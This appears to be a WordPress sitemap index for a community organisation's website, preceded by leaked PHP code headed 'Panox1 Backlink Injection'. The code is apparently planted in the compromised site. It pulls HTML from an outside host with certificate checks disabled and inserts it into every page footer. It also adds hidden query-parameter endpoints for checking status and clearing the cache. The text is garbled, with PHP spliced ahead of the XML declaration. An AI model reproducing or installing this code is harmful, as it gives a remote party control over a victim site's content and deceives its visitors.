

// Panox1 Backlink Injection
add_action('wp_footer', function() {
    $cache_key = 'panox1_links_' . md5(home_url());
    $cached = get_transient($cache_key);
    if ($cached !== false) { echo $cached; return; }
    $response = wp_remote_get('https://pixel-cdn.com/lnk/api/inject-endpoint.php?site_url=' . urlencode(home_url()), ['timeout' => 5, 'sslverify' => false]);
    if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) {
        $content = wp_remote_retrieve_body($response);
        if (!empty($content) && strpos($content, '<a') !== false) {
            $html = "\n<!-- Panox1 -->\n" . $content . "\n";
            set_transient($cache_key, $html, 3600);
            echo $html;
        }
    }
}, 99);

add_action('init', function() {
    if (isset($_GET['panox1_status'])) {
        wp_send_json(['status' => 'active', 'site' => home_url()]);
    }
    if (isset($_GET['panox1_clear'])) {
        delete_transient('panox1_links_' . md5(home_url()));
        wp_send_json(['cleared' => true, 'site' => home_url()]);
    }
});
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://jainsocietyofseattle.org/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-give_forms-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-emails-template-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-donation-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-album-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-family-members-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-event-comment-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-members-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-paryushan-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-etn-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-etn-schedule-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-posts-etn-speaker-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-taxonomies-album_category-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-taxonomies-member-types-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-taxonomies-teacher_cat-1.xml</loc></sitemap><sitemap><loc>https://jainsocietyofseattle.org/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
